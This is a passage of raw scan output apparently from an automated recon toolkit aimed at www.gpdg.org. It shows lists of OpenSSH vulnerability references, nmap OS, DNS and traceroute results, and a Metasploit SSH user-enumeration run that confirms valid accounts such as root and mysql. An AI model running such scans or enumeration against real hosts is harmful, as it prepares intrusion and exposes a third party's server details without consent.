3808| [75990] OpenSSH Login Handling Security Bypass Weakness
3809| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
3810| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
3811| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
3812| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
3813| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
3814| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
3815| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
3816| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
3817| [61286] OpenSSH Remote Denial of Service Vulnerability
3818| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
3819| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
3820| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
3821| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
3822| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
3823| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3824| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
3825| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
3826| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3827| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
3828| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
3829| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
3830| [30794] Red Hat OpenSSH Backdoor Vulnerability
3831| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
3832| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
3833| [28531] OpenSSH ForceCommand Command Execution Weakness
3834| [28444] OpenSSH X Connections Session Hijacking Vulnerability
3835| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
3836| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
3837| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
3838| [20956] OpenSSH Privilege Separation Key Signature Weakness
3839| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
3840| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
3841| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
3842| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
3843| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
3844| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
3845| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
3846| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
3847| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
3848| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
3849| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
3850| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
3851| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
3852| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
3853| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
3854| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
3855| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
3856| [6168] OpenSSH Visible Password Vulnerability
3857| [5374] OpenSSH Trojan Horse Vulnerability
3858| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
3859| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3860| [4241] OpenSSH Channel Code Off-By-One Vulnerability
3861| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
3862| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
3863| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
3864| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
3865| [2917] OpenSSH PAM Session Evasion Vulnerability
3866| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
3867| [2356] OpenSSH Private Key Authentication Check Vulnerability
3868| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
3869| [1334] OpenSSH UseLogin Vulnerability
3870|
3871| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3872| [83258] GSI-OpenSSH auth-pam.c security bypass
3873| [82781] OpenSSH time limit denial of service
3874| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
3875| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
3876| [72756] Debian openssh-server commands information disclosure
3877| [68339] OpenSSH pam_thread buffer overflow
3878| [67264] OpenSSH ssh-keysign unauthorized access
3879| [65910] OpenSSH remote_glob function denial of service
3880| [65163] OpenSSH certificate information disclosure
3881| [64387] OpenSSH J-PAKE security bypass
3882| [63337] Cisco Unified Videoconferencing OpenSSH weak security
3883| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
3884| [45202] OpenSSH signal handler denial of service
3885| [44747] RHEL OpenSSH backdoor
3886| [44280] OpenSSH PermitRootLogin information disclosure
3887| [44279] OpenSSH sshd weak security
3888| [44037] OpenSSH sshd SELinux role unauthorized access
3889| [43940] OpenSSH X11 forwarding information disclosure
3890| [41549] OpenSSH ForceCommand directive security bypass
3891| [41438] OpenSSH sshd session hijacking
3892| [40897] OpenSSH known_hosts weak security
3893| [40587] OpenSSH username weak security
3894| [37371] OpenSSH username data manipulation
3895| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
3896| [37112] RHSA update for OpenSSH signal handler race condition not installed
3897| [37107] RHSA update for OpenSSH identical block denial of service not installed
3898| [36637] OpenSSH X11 cookie privilege escalation
3899| [35167] OpenSSH packet.c newkeys[mode] denial of service
3900| [34490] OpenSSH OPIE information disclosure
3901| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
3902| [32975] Apple Mac OS X OpenSSH denial of service
3903| [32387] RHSA-2006:0738 updates for openssh not installed
3904| [32359] RHSA-2006:0697 updates for openssh not installed
3905| [32230] RHSA-2006:0298 updates for openssh not installed
3906| [32132] RHSA-2006:0044 updates for openssh not installed
3907| [30120] OpenSSH privilege separation monitor authentication verification weakness
3908| [29255] OpenSSH GSSAPI user enumeration
3909| [29254] OpenSSH signal handler race condition
3910| [29158] OpenSSH identical block denial of service
3911| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
3912| [25116] OpenSSH OpenPAM denial of service
3913| [24305] OpenSSH SCP shell expansion command execution
3914| [22665] RHSA-2005:106 updates for openssh not installed
3915| [22117] OpenSSH GSSAPI allows elevated privileges
3916| [22115] OpenSSH GatewayPorts security bypass
3917| [20930] OpenSSH sshd.c LoginGraceTime denial of service
3918| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
3919| [17213] OpenSSH allows port bouncing attacks
3920| [16323] OpenSSH scp file overwrite
3921| [13797] OpenSSH PAM information leak
3922| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
3923| [13264] OpenSSH PAM code could allow an attacker to gain access
3924| [13215] OpenSSH buffer management errors could allow an attacker to execute code
3925| [13214] OpenSSH memory vulnerabilities
3926| [13191] OpenSSH large packet buffer overflow
3927| [12196] OpenSSH could allow an attacker to bypass login restrictions
3928| [11970] OpenSSH could allow an attacker to obtain valid administrative account
3929| [11902] OpenSSH PAM support enabled information leak
3930| [9803] OpenSSH "
3931| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
3932| [9307] OpenSSH is running on the system
3933| [9169] OpenSSH "
3934| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
3935| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
3936| [8383] OpenSSH off-by-one error in channel code
3937| [7647] OpenSSH UseLogin option arbitrary code execution
3938| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
3939| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
3940| [7179] OpenSSH source IP access control bypass
3941| [6757] OpenSSH "
3942| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
3943| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
3944| [5517] OpenSSH allows unauthorized access to resources
3945| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
3946|
3947| Exploit-DB - https://www.exploit-db.com:
3948| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
3949| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
3950| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
3951| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
3952| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
3953| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
3954| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
3955| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
3956| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
3957| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
3958| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
3959| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
3960| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
3961| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
3962|
3963| OpenVAS (Nessus) - http://www.openvas.org:
3964| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
3965| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
3966| [881183] CentOS Update for openssh CESA-2012:0884 centos6
3967| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
3968| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
3969| [870763] RedHat Update for openssh RHSA-2012:0884-04
3970| [870129] RedHat Update for openssh RHSA-2008:0855-01
3971| [861813] Fedora Update for openssh FEDORA-2010-5429
3972| [861319] Fedora Update for openssh FEDORA-2007-395
3973| [861170] Fedora Update for openssh FEDORA-2007-394
3974| [861012] Fedora Update for openssh FEDORA-2007-715
3975| [840345] Ubuntu Update for openssh vulnerability USN-597-1
3976| [840300] Ubuntu Update for openssh update USN-612-5
3977| [840271] Ubuntu Update for openssh vulnerability USN-612-2
3978| [840268] Ubuntu Update for openssh update USN-612-7
3979| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
3980| [840214] Ubuntu Update for openssh vulnerability USN-566-1
3981| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
3982| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
3983| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
3984| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
3985| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
3986| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
3987| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
3988| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
3989| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
3990| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3991| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3992| [100584] OpenSSH X Connections Session Hijacking Vulnerability
3993| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
3994| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
3995| [65987] SLES10: Security update for OpenSSH
3996| [65819] SLES10: Security update for OpenSSH
3997| [65514] SLES9: Security update for OpenSSH
3998| [65513] SLES9: Security update for OpenSSH
3999| [65334] SLES9: Security update for OpenSSH
4000| [65248] SLES9: Security update for OpenSSH
4001| [65218] SLES9: Security update for OpenSSH
4002| [65169] SLES9: Security update for openssh,openssh-askpass
4003| [65126] SLES9: Security update for OpenSSH
4004| [65019] SLES9: Security update for OpenSSH
4005| [65015] SLES9: Security update for OpenSSH
4006| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
4007| [61639] Debian Security Advisory DSA 1638-1 (openssh)
4008| [61030] Debian Security Advisory DSA 1576-2 (openssh)
4009| [61029] Debian Security Advisory DSA 1576-1 (openssh)
4010| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
4011| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
4012| [60667] Slackware Advisory SSA:2008-095-01 openssh
4013| [59014] Slackware Advisory SSA:2007-255-01 openssh
4014| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
4015| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
4016| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
4017| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
4018| [57492] Slackware Advisory SSA:2006-272-02 openssh
4019| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
4020| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
4021| [57470] FreeBSD Ports: openssh
4022| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
4023| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
4024| [56294] Slackware Advisory SSA:2006-045-06 openssh
4025| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
4026| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
4027| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
4028| [53788] Debian Security Advisory DSA 025-1 (openssh)
4029| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
4030| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
4031| [11343] OpenSSH Client Unauthorized Remote Forwarding
4032| [10954] OpenSSH AFS/Kerberos ticket/token passing
4033| [10883] OpenSSH Channel Code Off by 1
4034| [10823] OpenSSH UseLogin Environment Variables
4035|
4036| SecurityTracker - https://www.securitytracker.com:
4037| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
4038| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
4039| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
4040| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
4041| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
4042| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
4043| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
4044| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
4045| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
4046| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
4047| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
4048| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
4049| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
4050| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
4051| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
4052| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
4053| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
4054| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
4055| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
4056| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
4057| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
4058| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
4059| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
4060| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
4061| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
4062| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
4063| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
4064| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
4065| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
4066| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
4067| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
4068| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
4069| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
4070| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
4071| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
4072| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
4073| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
4074| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
4075|
4076| OSVDB - http://www.osvdb.org:
4077| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
4078| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
4079| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
4080| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
4081| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
4082| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
4083| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
4084| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
4085| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
4086| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
4087| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
4088| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
4089| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
4090| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
4091| [56921] OpenSSH Unspecified Remote Compromise
4092| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
4093| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
4094| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
4095| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
4096| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
4097| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
4098| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
4099| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
4100| [43745] OpenSSH X11 Forwarding Local Session Hijacking
4101| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
4102| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
4103| [37315] pam_usb OpenSSH Authentication Unspecified Issue
4104| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
4105| [34601] OPIE w/ OpenSSH Account Enumeration
4106| [34600] OpenSSH S/KEY Authentication Account Enumeration
4107| [32721] OpenSSH Username Password Complexity Account Enumeration
4108| [30232] OpenSSH Privilege Separation Monitor Weakness
4109| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
4110| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
4111| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
4112| [29152] OpenSSH Identical Block Packet DoS
4113| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
4114| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
4115| [22692] OpenSSH scp Command Line Filename Processing Command Injection
4116| [20216] OpenSSH with KerberosV Remote Authentication Bypass
4117| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
4118| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
4119| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
4120| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
4121| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
4122| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
4123| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
4124| [6601] OpenSSH *realloc() Unspecified Memory Errors
4125| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
4126| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
4127| [6072] OpenSSH PAM Conversation Function Stack Modification
4128| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
4129| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
4130| [5408] OpenSSH echo simulation Information Disclosure
4131| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
4132| [4536] OpenSSH Portable AIX linker Privilege Escalation
4133| [3938] OpenSSL and OpenSSH /dev/random Check Failure
4134| [3456] OpenSSH buffer_append_space() Heap Corruption
4135| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
4136| [2140] OpenSSH w/ PAM Username Validity Timing Attack
4137| [2112] OpenSSH Reverse DNS Lookup Bypass
4138| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
4139| [1853] OpenSSH Symbolic Link 'cookies' File Removal
4140| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
4141| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
4142| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
4143| [688] OpenSSH UseLogin Environment Variable Local Command Execution
4144| [642] OpenSSH Multiple Key Type ACL Bypass
4145| [504] OpenSSH SSHv2 Public Key Authentication Bypass
4146| [341] OpenSSH UseLogin Local Privilege Escalation
4147|_
4148Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4149Device type: general purpose
4150Running (JUST GUESSING): Linux 3.X|4.X (90%)
4151OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.0
4152Aggressive OS guesses: Linux 3.10 - 3.16 (90%), Linux 3.10 (88%), Linux 4.0 (88%), Linux 3.10 - 3.12 (87%), Linux 4.4 (87%), Linux 4.9 (87%)
4153No exact OS matches for host (test conditions non-ideal).
4154Network Distance: 14 hops
4155
4156TRACEROUTE (using port 22/tcp)
4157HOP RTT ADDRESS
41581 129.91 ms 10.245.200.1
41592 ...
41603 129.97 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
41614 130.00 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
41625 134.33 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
41636 153.15 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
41647 161.58 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
41658 158.38 ms be2434.agr21.ams03.atlas.cogentco.com (130.117.2.241)
41669 157.70 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
416710 168.40 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
416811 209.83 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
416912 172.93 ms 62.100.128.107
417013 182.37 ms 62.100.128.115
417114 183.81 ms vps2330-cloud.sd-france.net (92.39.247.11)
4172#######################################################################################################################################
4173USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
4174RHOSTS => www.gpdg.org
4175RHOST => www.gpdg.org
4176[*] 92.39.247.11:22 - SSH - Using malformed packet technique
4177[*] 92.39.247.11:22 - SSH - Starting scan
4178[-] 92.39.247.11:22 - SSH - User 'admin' not found
4179[-] 92.39.247.11:22 - SSH - User 'administrator' not found
4180[-] 92.39.247.11:22 - SSH - User 'anonymous' not found
4181[-] 92.39.247.11:22 - SSH - User 'backup' not found
4182[-] 92.39.247.11:22 - SSH - User 'bee' not found
4183[+] 92.39.247.11:22 - SSH - User 'ftp' found
4184[-] 92.39.247.11:22 - SSH - User 'guest' not found
4185[-] 92.39.247.11:22 - SSH - User 'GUEST' not found
4186[-] 92.39.247.11:22 - SSH - User 'info' not found
4187[+] 92.39.247.11:22 - SSH - User 'mail' found
4188[-] 92.39.247.11:22 - SSH - User 'mailadmin' not found
4189[-] 92.39.247.11:22 - SSH - User 'msfadmin' not found
4190[+] 92.39.247.11:22 - SSH - User 'mysql' found
4191[+] 92.39.247.11:22 - SSH - User 'nobody' found
4192[-] 92.39.247.11:22 - SSH - User 'oracle' not found
4193[-] 92.39.247.11:22 - SSH - User 'owaspbwa' not found
4194[+] 92.39.247.11:22 - SSH - User 'postfix' found
4195[-] 92.39.247.11:22 - SSH - User 'postgres' not found
4196[-] 92.39.247.11:22 - SSH - User 'private' not found
4197[-] 92.39.247.11:22 - SSH - User 'proftpd' not found
4198[-] 92.39.247.11:22 - SSH - User 'public' not found
4199[+] 92.39.247.11:22 - SSH - User 'root' found
4200[-] 92.39.247.11:22 - SSH - User 'superadmin' not found
4201[-] 92.39.247.11:22 - SSH - User 'support' not found
4202[-] 92.39.247.11:22 - SSH - User 'sys' not found
4203[-] 92.39.247.11:22 - SSH - User 'system' not found
4204[-] 92.39.247.11:22 - SSH - User 'systemadmin' not found
4205[-] 92.39.247.11:22 - SSH - User 'systemadministrator' not found
4206[-] 92.39.247.11:22 - SSH - User 'test' not found
4207[-] 92.39.247.11:22 - SSH - User 'tomcat' not found
4208[-] 92.39.247.11:22 - SSH - User 'user' not found
4209[-] 92.39.247.11:22 - SSH - User 'webmaster' not found
4210[-] 92.39.247.11:22 - SSH - User 'www-data' not found
4211[-] 92.39.247.11:22 - SSH - User 'Fortimanager_Access' not found
4212[*] Scanned 1 of 1 hosts (100% complete)
4213[*] Auxiliary module execution completed
4214#######################################################################################################################################
4215Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:50 EST
4216Nmap scan report for www.gpdg.org (92.39.247.11)
4217Host is up (0.19s latency).
4218rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
4219
4220PORT STATE SERVICE VERSION
422153/tcp open domain (unknown banner: none)
4222|_dns-fuzz: Server didn't response to our probe, can't fuzz
4223| dns-nsec-enum:
4224|_ No NSEC records found
4225| dns-nsec3-enum:
4226|_ DNSSEC NSEC3 not supported
4227| dns-nsid:
4228|_ bind.version: none
4229| fingerprint-strings:
4230| DNSVersionBindReqTCP:
4231| version
4232| bind
4233|_ none
42341 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
4235SF-Port53-TCP:V=7.80%I=7%D=11/25%Time=5DDC067E%P=x86_64-pc-linux-gnu%r(DNS
4236SF:VersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\
4237SF:x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c
4238SF:\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
4239Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4240Device type: general purpose
4241Running (JUST GUESSING): Linux 3.X|4.X (90%)
4242OS CPE: cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.4
4243Aggressive OS guesses: Linux 3.10 (90%), Linux 3.10 - 3.16 (90%), Linux 3.10 - 3.12 (89%), Linux 4.4 (89%), Linux 4.9 (89%), Linux 4.0 (88%)
4244No exact OS matches for host (test conditions non-ideal).
4245Network Distance: 14 hops
4246
4247Host script results:
4248| dns-brute:
4249| DNS Brute-force hostnames:
4250| www.gpdg.org - 92.39.247.11
4251|_ mail.gpdg.org - 92.39.247.11
4252
4253TRACEROUTE (using port 53/tcp)
4254HOP RTT ADDRESS
42551 128.65 ms 10.245.200.1
42562 ...
42573 128.75 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
42584 128.74 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
42595 133.69 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
42606 156.70 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
